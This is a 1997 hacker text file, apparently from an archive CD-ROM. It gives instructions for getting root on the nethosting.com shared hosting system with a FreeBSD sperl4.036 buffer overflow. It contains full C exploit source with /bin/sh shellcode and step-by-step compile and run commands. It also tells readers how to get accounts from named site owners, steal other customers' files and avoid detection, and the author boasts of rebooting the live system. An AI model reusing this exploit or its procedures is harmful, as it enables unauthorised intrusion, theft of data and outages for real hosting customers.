home *** CD-ROM | disk | FTP | other *** search
/ Hacks & Cracks / Hacks_and_Cracks.iso / hackersclub / km / library / hack / lsnethosting.txt < prev    next >
Text File  |  1998-03-25  |  5KB  |  104 lines

  1.           //------------------------------------------------\\
  2.           ||  Get Read/Write/Reboot/Shutdown access to the  ||
  3.           ||   entire nethosting.com system including all   ||
  4.           ||            231 of its subdomains!              ||
  5.           ||   By: Lord Somer(webmaster@lordsomer.com)      ||
  6.           ||               on August 4, 1997                ||
  7.           ||  For: The Hackers Layer                        ||
  8.           ||       http://www.lordsomer.com                 ||
  9.           ||             and                                ||
  10.           ||       The Hackers Club                         ||
  11.           ||       http://www.hackersclub.com/km/index.html ||
  12.           \\------------------------------------------------//
  13.  
  14. Well Recently I was Logged into a nethosting.com account on telnet
  15. reconfiguring my eggdrop bot, and I found the file perl.c(including below)
  16. and thought to myself what might this be so I grabbed a copy for myself
  17. and it said it was a sperl exploit and not much else, so I figured what the
  18. hell lets test this sucker, so I ran it low and behold root access sorta
  19. you have permission to do everything but addusers(go figure!), so just to
  20. make sure it wasn't bullshit I did a reboot on the sys hence the system
  21. outage on 8/2-8/3 for many domains including hawkee.com(more on this later).
  22. Well when it finally came back online amasingly, I decide to do more probing
  23. after running that exploit again, I decide what the hell lets do a test so
  24. I go into TwoSlows accounts dir(yes he's on there) and make a nice dir called
  25. suptwoslow for him and he confirmed that it was in his account, thus proving
  26. that you get world read/write/reboot/shutdown.  If anyone figures out how
  27. to addusers on this sys let me know.
  28. Ok enough of the stories on with the instructions...
  29. First Make a new text file and name it perl.c, and cut/paste the below part
  30. minus the 2 --- lines seperating it out.
  31.  
  32. ----------------------Begin Perl.c---------------------------------
  33.  
  34. /************************************************************/
  35. /*   Exploit for FreeBSD sperl4.036 by OVX                  */
  36. /************************************************************/
  37.  
  38. #include <stdio.h>
  39. #include <stdlib.h>
  40. #include <unistd.h>
  41.  
  42. #define BUFFER_SIZE     1400
  43. #define OFFSET          600
  44.  
  45. char *get_esp(void) {
  46.     asm("movl %esp,%eax");
  47. }
  48. char buf[BUFFER_SIZE];
  49.  
  50. main(int argc, char *argv[])
  51. {
  52.         int i;
  53.         char execshell[] =
  54.         "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
  55.         "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
  56.         "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
  57.         "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
  58.  
  59.         for(i=0+1;i<BUFFER_SIZE-4;i+=4)
  60.           *(char **)&buf[i] = get_esp() - OFFSET;
  61.  
  62.         memset(buf,0x90,768+1);
  63.         memcpy(&buf[768+1],execshell,strlen(execshell));
  64.  
  65.         buf[BUFFER_SIZE-1]=0;
  66.  
  67.         execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
  68. }
  69. --------------------------End Perl.c------------------------------------
  70.  
  71. ok well your gonna need telnet access for this sucker to work, hmm who to 
  72. get that from? well only the domains owners that are hosted on nethosting
  73. have this access so offer them a deal you'll show em how to do this.
  74. A few People To ask might be:
  75. www.hpvca.com
  76. www.warez950.org
  77. www.7thsphere.com
  78. www.lgn.com
  79. www.hawkee.com
  80. Ok so by now you've gotten telnet access to the sys.
  81. which means your got ftp also, so ftp in to the account and upload perl.c
  82. then logout of ftp, and telnet in, cd to the dir you up'd perl.c to.
  83. Type cc perl.c
  84. then ./a.out
  85. type those exactly and hit enter after each one.
  86. your command prompt should change to a #
  87. type whoami
  88. should respond root
  89. well there ya have it feel free to do what ya like.
  90. oh yeah and say you hit someone like hawkee.com's cgibin dir, he has blocked
  91. group ftp access to this dir, oh shucks ya say.  Eh easy as pie to solve
  92. in the account you have ftp access to make a temp dir to copy the shit ya 
  93. want to. get the full patth to it like /usr/home/sucker.com/temp
  94. k,
  95. back in the shell(after running exploit) go to dir ya wanna steal and type
  96. cp * /path/to/temp/stealing/dir
  97.  
  98. Enjoy, and hope ya can get on considering nethosting.com is down 80% of the
  99. time.  Oh and also nethosting.com is also eggable, wanna know how to install
  100. eggdrop just read my guide at http://www.lordsomer.com/eggdrop.html
  101.  
  102. 1 Great thing about this exploit is, nethosting.com cant tell you have root
  103. access, since it still looks like you are the user you logged in with.
  104.